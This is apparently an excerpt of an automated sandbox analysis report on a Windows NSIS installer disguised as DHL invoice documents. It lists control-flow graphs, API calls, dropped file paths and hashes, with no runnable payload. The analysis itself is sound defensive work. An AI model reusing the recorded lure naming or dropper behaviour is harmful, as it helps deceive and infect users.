                                            control_flow_graph 802 40177e-4017a1 call 402c5e call 405c8c 807 4017a3-4017a9 call 40628d 802->807 808 4017ab-4017bd call 40628d call 405c1f lstrcatA 802->808 813 4017c2-4017c8 call 406587 807->813 808->813 818 4017cd-4017d1 813->818 819 4017d3-4017dd call 406620 818->819 820 401804-401807 818->820 828 4017ef-401801 819->828 829 4017df-4017ed CompareFileTime 819->829 821 401809-40180a call 405dfb 820->821 822 40180f-40182b call 405e20 820->822 821->822 830 4018a3-4018cc call 4053d1 call 403168 822->830 831 40182d-401830 822->831 828->820 829->828 843 4018d4-4018e0 SetFileTime 830->843 844 4018ce-4018d2 830->844 832 401832-401874 call 40628d * 2 call 406320 call 40628d call 4059a3 831->832 833 401885-40188f call 4053d1 831->833 832->818 865 40187a-40187b 832->865 845 401898-40189e 833->845 847 4018e6-4018f1 FindCloseChangeNotification 843->847 844->843 844->847 848 402af3 845->848 850 4018f7-4018fa 847->850 851 402aea-402aed 847->851 852 402af5-402af9 848->852 854 4018fc-40190d call 406320 lstrcatA 850->854 855 40190f-401912 call 406320 850->855 851->848 862 401917-4023af 854->862 855->862 866 4023b4-4023b9 862->866 867 4023af call 4059a3 862->867 865->845 868 40187d-40187e 865->868 866->852 867->866 868->833
                                            APIs
                                            • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\kapselaabnernes,00000000,00000000,00000031), ref: 004017BD
                                            • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\kapselaabnernes,00000000,00000000,00000031), ref: 004017E7
                                              • Part of subcall function 0040628D: lstrcpynA.KERNEL32(?,?,00000400,0040357B,Traveskoens Setup,NSIS Error,?,?,0000000A,?), ref: 0040629A
                                              • Part of subcall function 004053D1: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsxA376.tmp\System.dll,00000000,00424440,767D23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000,?), ref: 0040540A
                                              • Part of subcall function 004053D1: lstrlenA.KERNEL32(004032C3,Skipped: C:\Users\user\AppData\Local\Temp\nsxA376.tmp\System.dll,00000000,00424440,767D23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000), ref: 0040541A
                                              • Part of subcall function 004053D1: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsxA376.tmp\System.dll,004032C3,004032C3,Skipped: C:\Users\user\AppData\Local\Temp\nsxA376.tmp\System.dll,00000000,00424440,767D23A0), ref: 0040542D
                                              • Part of subcall function 004053D1: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsxA376.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsxA376.tmp\System.dll), ref: 0040543F
                                              • Part of subcall function 004053D1: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405465
                                              • Part of subcall function 004053D1: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040547F
                                              • Part of subcall function 004053D1: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040548D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434611666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1434581772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434641495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434917134.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                            • String ID: C:\Users\user\AppData\Local\Temp\nsxA376.tmp$C:\Users\user\AppData\Local\Temp\nsxA376.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\kapselaabnernes$Call
                                            • API String ID: 1941528284-3403434034
                                            • Opcode ID: 0acf61fd71f3edde6b321a3403c7c5eac4b41d6d52f200133c1c8b0501db61a2
                                            • Instruction ID: a1f186b67c4edeb34fad59b9cedf70daa635d1c2101920768012b0df21243cfe
                                            • Opcode Fuzzy Hash: 0acf61fd71f3edde6b321a3403c7c5eac4b41d6d52f200133c1c8b0501db61a2
                                            • Instruction Fuzzy Hash: 6041C331900515BBCB107BA5CD46EAF3A78DF05328F20823FF526F11E2D67C8A519AAD

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 869 4053d1-4053e6 870 40549c-4054a0 869->870 871 4053ec-4053fe 869->871 872 405400-405404 call 406320 871->872 873 405409-405415 lstrlenA 871->873 872->873 875 405432-405436 873->875 876 405417-405427 lstrlenA 873->876 878 405445-405449 875->878 879 405438-40543f SetWindowTextA 875->879 876->870 877 405429-40542d lstrcatA 876->877 877->875 880 40544b-40548d SendMessageA * 3 878->880 881 40548f-405491 878->881 879->878 880->881 881->870 882 405493-405496 881->882 882->870
                                            APIs
                                            • lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsxA376.tmp\System.dll,00000000,00424440,767D23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000,?), ref: 0040540A
                                            • lstrlenA.KERNEL32(004032C3,Skipped: C:\Users\user\AppData\Local\Temp\nsxA376.tmp\System.dll,00000000,00424440,767D23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000), ref: 0040541A
                                            • lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsxA376.tmp\System.dll,004032C3,004032C3,Skipped: C:\Users\user\AppData\Local\Temp\nsxA376.tmp\System.dll,00000000,00424440,767D23A0), ref: 0040542D
                                            • SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsxA376.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsxA376.tmp\System.dll), ref: 0040543F
                                            • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405465
                                            • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040547F
                                            • SendMessageA.USER32(?,00001013,?,00000000), ref: 0040548D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434611666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1434581772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434641495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434917134.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                            • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsxA376.tmp\System.dll
                                            • API String ID: 2531174081-3701479238
                                            • Opcode ID: 04eedc2ba923f0a8d7eb9848a27cab945aaff25bd16a1fb9afb004099d42d10e
                                            • Instruction ID: 7fccb86dafa480228006d80d04b82b7e1b017f67e9930a1aa42837d262fd4390
                                            • Opcode Fuzzy Hash: 04eedc2ba923f0a8d7eb9848a27cab945aaff25bd16a1fb9afb004099d42d10e
                                            • Instruction Fuzzy Hash: 81218971900118BBDF11AFA5CD85ADEBFA9EB05354F14807AF944B6291C6788E81CFA8

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 883 403168-40317c 884 403185-40318e 883->884 885 40317e 883->885 886 403190 884->886 887 403197-40319c 884->887 885->884 886->887 888 4031ac-4031b9 call 40337a 887->888 889 40319e-4031a7 call 403390 887->889 893 403368 888->893 894 4031bf-4031c3 888->894 889->888 895 40336a-40336b 893->895 896 403313-403315 894->896 897 4031c9-403212 GetTickCount 894->897 900 403373-403377 895->900 898 403355-403358 896->898 899 403317-40331a 896->899 901 403370 897->901 902 403218-403220 897->902 903 40335a 898->903 904 40335d-403366 call 40337a 898->904 899->901 905 40331c 899->905 901->900 906 403222 902->906 907 403225-403233 call 40337a 902->907 903->904 904->893 915 40336d 904->915 909 40331f-403325 905->909 906->907 907->893 917 403239-403242 907->917 912 403327 909->912 913 403329-403337 call 40337a 909->913 912->913 913->893 921 403339-403345 call 405ec7 913->921 915->901 918 403248-403268 call 4067da 917->918 925 40330b-40330d 918->925 926 40326e-403281 GetTickCount 918->926 927 403347-403351 921->927 928 40330f-403311 921->928 925->895 929 403283-40328b 926->929 930 4032c6-4032c8 926->930 927->909 931 403353 927->931 928->895 932 403293-4032be MulDiv wsprintfA call 4053d1 929->932 933 40328d-403291 929->933 934 4032ca-4032ce 930->934 935 4032ff-403303 930->935 931->901 941 4032c3 932->941 933->930 933->932 938 4032d0-4032d7 call 405ec7 934->938 939 4032e5-4032f0 934->939 935->902 936 403309 935->936 936->901 944 4032dc-4032de 938->944 940 4032f3-4032f7 939->940 940->918 943 4032fd 940->943 941->930 943->901 944->928 945 4032e0-4032e3 944->945 945->940
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434611666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1434581772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434641495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434917134.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: CountTick$wsprintf
                                            • String ID: ... %d%%$@DB
                                            • API String ID: 551687249-1316549817
                                            • Opcode ID: bbbdf68c611b1039cd3d8d859c56e524a634e556e3416af6923e642436e137c0
                                            • Instruction ID: 381bea1cd078569db79acba847b1f3aad866332683383cfda6df38e9538e1e3d
                                            • Opcode Fuzzy Hash: bbbdf68c611b1039cd3d8d859c56e524a634e556e3416af6923e642436e137c0
                                            • Instruction Fuzzy Hash: 91513D71800219EBDB10DF65DA84B9E7BB8EB5535AF14417BEC00B72D0CB789A50CBA9

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 953 402d60-402d89 call 406113 955 402d8e-402d92 953->955 956 402e43-402e47 955->956 957 402d98-402d9c 955->957 958 402dc1-402dd4 957->958 959 402d9e-402dbf RegEnumValueA 957->959 961 402dfd-402e04 RegEnumKeyA 958->961 959->958 960 402e28-402e36 RegCloseKey 959->960 960->956 962 402dd6-402dd8 961->962 963 402e06-402e18 RegCloseKey call 4066b5 961->963 962->960 964 402dda-402dee call 402d60 962->964 969 402e38-402e3e 963->969 970 402e1a-402e26 RegDeleteKeyA 963->970 964->963 971 402df0-402dfc 964->971 969->956 970->956 971->961
                                            APIs
                                            • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402DB4
                                            • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402E00
                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402E09
                                            • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402E20
                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402E2B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434611666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1434581772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434641495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434917134.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: CloseEnum$DeleteValue
                                            • String ID:
                                            • API String ID: 1354259210-0
                                            • Opcode ID: 31db4fe3a83ab3222004bb99c88de970b8ea6707b57bc237e5c93fbc2d64a622
                                            • Instruction ID: 6dce0a33df475c695949d28520f5422678f12aee2cc84e9e423a55bf09ef2c56
                                            • Opcode Fuzzy Hash: 31db4fe3a83ab3222004bb99c88de970b8ea6707b57bc237e5c93fbc2d64a622
                                            • Instruction Fuzzy Hash: 3B215C7250010CBBDF129F90CE89EEF7B6DEB44344F100076FA15B11A0E7B48F54AAA8

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 972 6f7a176b-6f7a17a7 call 6f7a1b28 976 6f7a17ad-6f7a17b1 972->976 977 6f7a18c4-6f7a18c6 972->977 978 6f7a17ba-6f7a17c7 call 6f7a2381 976->978 979 6f7a17b3-6f7a17b9 call 6f7a233f 976->979 984 6f7a17c9-6f7a17ce 978->984 985 6f7a17f7-6f7a17fe 978->985 979->978 988 6f7a17e9-6f7a17ec 984->988 989 6f7a17d0-6f7a17d1 984->989 986 6f7a181e-6f7a1822 985->986 987 6f7a1800-6f7a181c call 6f7a2568 call 6f7a15e9 call 6f7a12f6 GlobalFree 985->987 994 6f7a186c-6f7a1872 call 6f7a2568 986->994 995 6f7a1824-6f7a186a call 6f7a15fb call 6f7a2568 986->995 1012 6f7a1873-6f7a1877 987->1012 988->985 990 6f7a17ee-6f7a17ef call 6f7a2d53 988->990 992 6f7a17d9-6f7a17da call 6f7a2ac8 989->992 993 6f7a17d3-6f7a17d4 989->993 1004 6f7a17f4 990->1004 1007 6f7a17df 992->1007 1000 6f7a17e1-6f7a17e7 call 6f7a2742 993->1000 1001 6f7a17d6-6f7a17d7 993->1001 994->1012 995->1012 1011 6f7a17f6 1000->1011 1001->985 1001->992 1004->1011 1007->1004 1011->985 1015 6f7a1879-6f7a1887 call 6f7a252e 1012->1015 1016 6f7a18b4-6f7a18bb 1012->1016 1022 6f7a1889-6f7a188c 1015->1022 1023 6f7a189f-6f7a18a6 1015->1023 1016->977 1018 6f7a18bd-6f7a18be GlobalFree 1016->1018 1018->977 1022->1023 1024 6f7a188e-6f7a1896 1022->1024 1023->1016 1025 6f7a18a8-6f7a18b3 call 6f7a1572 1023->1025 1024->1023 1027 6f7a1898-6f7a1899 FreeLibrary 1024->1027 1025->1016 1027->1023
                                            APIs
                                              • Part of subcall function 6F7A1B28: GlobalFree.KERNEL32(?), ref: 6F7A1D99
                                              • Part of subcall function 6F7A1B28: GlobalFree.KERNEL32(?), ref: 6F7A1D9E
                                              • Part of subcall function 6F7A1B28: GlobalFree.KERNEL32(?), ref: 6F7A1DA3
                                            • GlobalFree.KERNEL32(00000000), ref: 6F7A1816
                                            • FreeLibrary.KERNEL32(?), ref: 6F7A1899
                                            • GlobalFree.KERNEL32(00000000), ref: 6F7A18BE
                                              • Part of subcall function 6F7A233F: GlobalAlloc.KERNEL32(?,?), ref: 6F7A2370
                                              • Part of subcall function 6F7A2742: GlobalAlloc.KERNEL32(?,00000000,?,?,00000000,?,?,?,6F7A17E7,00000000), ref: 6F7A2812
                                              • Part of subcall function 6F7A15FB: wsprintfA.USER32 ref: 6F7A1629
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1462661208.000000006F7A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6F7A0000, based on PE: true
                                            • Associated: 00000000.00000002.1462619508.000000006F7A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000000.00000002.1462725067.000000006F7A4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000000.00000002.1462782855.000000006F7A6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6f7a0000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: Global$Free$Alloc$Librarywsprintf
                                            • String ID:
                                            • API String ID: 3962662361-3916222277
                                            • Opcode ID: 3bf4ef81e32e2fd92edf65ba29de4a292e472d54a08ba12192df5ca8abf921d5
                                            • Instruction ID: 7cdd36f2165ae998bf8d4eaaef1d2269495ae4b8667c3900257c865f522067bc
                                            • Opcode Fuzzy Hash: 3bf4ef81e32e2fd92edf65ba29de4a292e472d54a08ba12192df5ca8abf921d5
                                            • Instruction Fuzzy Hash: 1E41C4714003049AEB009F748E88BDA37ACBF05324F0683B6E9159E0D2DFF6A155CFA1

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1029 4024a3-4024ca call 402c5e * 2 call 402cee 1035 4024cf-4024d4 1029->1035 1036 402aea-402af9 1035->1036 1037 4024da-4024e4 1035->1037 1039 4024f4-4024f7 1037->1039 1040 4024e6-4024f3 call 402c5e lstrlenA 1037->1040 1043 4024f9-40250d call 402c3c 1039->1043 1044 40250e-402511 1039->1044 1040->1039 1043->1044 1045 402522-402536 RegSetValueExA 1044->1045 1046 402513-40251d call 403168 1044->1046 1051 402538 1045->1051 1052 40253b-402618 RegCloseKey 1045->1052 1046->1045 1051->1052 1052->1036
                                            APIs
                                            • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsxA376.tmp,00000023,00000011,00000002), ref: 004024EE
                                            • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsxA376.tmp,00000000,00000011,00000002), ref: 0040252E
                                            • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsxA376.tmp,00000000,00000011,00000002), ref: 00402612
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434611666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1434581772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434641495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434917134.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: CloseValuelstrlen
                                            • String ID: C:\Users\user\AppData\Local\Temp\nsxA376.tmp
                                            • API String ID: 2655323295-2048479901
                                            • Opcode ID: 01be07207417a34e2fd7276a7f8dd5bd622f6c843808a50c06c527054a50520e
                                            • Instruction ID: bcff8488b3c7483af384f27edc247fb8d09a012b63b7e061f1957b9ca53072ec
                                            • Opcode Fuzzy Hash: 01be07207417a34e2fd7276a7f8dd5bd622f6c843808a50c06c527054a50520e
                                            • Instruction Fuzzy Hash: A5118172E04118BFEF10AFA59E49AAE7AB4EB44314F20443FF505F71D1C6B98D829A18

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1054 405e4f-405e59 1055 405e5a-405e85 GetTickCount GetTempFileNameA 1054->1055 1056 405e94-405e96 1055->1056 1057 405e87-405e89 1055->1057 1059 405e8e-405e91 1056->1059 1057->1055 1058 405e8b 1057->1058 1058->1059
                                            APIs
                                            • GetTickCount.KERNEL32 ref: 00405E63
                                            • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,004033D6,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,?), ref: 00405E7D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434611666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1434581772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434641495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434917134.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: CountFileNameTempTick
                                            • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                            • API String ID: 1716503409-944333549
                                            • Opcode ID: 785ee4e59b25deabe338fa9c65985dff7b7c4930a860df7800de2eab11a71ed7
                                            • Instruction ID: 3970c65dfeb72379d163dc795dbdbe3f0392b49dfad0d6f3c406a96719355742
                                            • Opcode Fuzzy Hash: 785ee4e59b25deabe338fa9c65985dff7b7c4930a860df7800de2eab11a71ed7
                                            • Instruction Fuzzy Hash: A0F082363042046BDB109F56EC04B9B7B9CEF91750F10803BF9889B180D6B099558798
                                            APIs
                                            • GetModuleHandleA.KERNELBASE(00000000,00000001,?), ref: 004020F5
                                              • Part of subcall function 004053D1: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsxA376.tmp\System.dll,00000000,00424440,767D23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000,?), ref: 0040540A
                                              • Part of subcall function 004053D1: lstrlenA.KERNEL32(004032C3,Skipped: C:\Users\user\AppData\Local\Temp\nsxA376.tmp\System.dll,00000000,00424440,767D23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000), ref: 0040541A
                                              • Part of subcall function 004053D1: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsxA376.tmp\System.dll,004032C3,004032C3,Skipped: C:\Users\user\AppData\Local\Temp\nsxA376.tmp\System.dll,00000000,00424440,767D23A0), ref: 0040542D
                                              • Part of subcall function 004053D1: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsxA376.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsxA376.tmp\System.dll), ref: 0040543F
                                              • Part of subcall function 004053D1: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405465
                                              • Part of subcall function 004053D1: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040547F
                                              • Part of subcall function 004053D1: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040548D
                                            • LoadLibraryExA.KERNELBASE(00000000,?,?,00000001,?), ref: 00402105
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00402115
                                            • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,?,00000001,?), ref: 0040217F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434611666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1434581772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434641495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434917134.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                            • String ID:
                                            • API String ID: 2987980305-0
                                            • Opcode ID: 056f6e09274932c5806e516a526782628814fdef0fe3ef9b51a109e535a48abd
                                            • Instruction ID: 18bbb9f6491bb16bc869df63e9f5beea4603ad23440c914569cabcc4b16c920a
                                            • Opcode Fuzzy Hash: 056f6e09274932c5806e516a526782628814fdef0fe3ef9b51a109e535a48abd
                                            • Instruction Fuzzy Hash: ED21C931A00115BBCF20BF659F89B6F7570AB40358F20413BF611B61D1CABD49839A5E
                                            APIs
                                              • Part of subcall function 00405CB8: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsxA376.tmp,?,00405D24,C:\Users\user\AppData\Local\Temp\nsxA376.tmp,C:\Users\user\AppData\Local\Temp\nsxA376.tmp,767D3410,?,C:\Users\user\AppData\Local\Temp\,00405A6F,?,767D3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe"), ref: 00405CC6
                                              • Part of subcall function 00405CB8: CharNextA.USER32(00000000), ref: 00405CCB
                                              • Part of subcall function 00405CB8: CharNextA.USER32(00000000), ref: 00405CDF
                                            • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,?,00000000,?), ref: 00401632
                                              • Part of subcall function 00405897: CreateDirectoryA.KERNELBASE(00431400,?), ref: 004058D9
                                            • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\kapselaabnernes,00000000,00000000,?), ref: 00401661
                                            Strings
                                            • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\kapselaabnernes, xrefs: 00401656
                                            Memory Dump Source
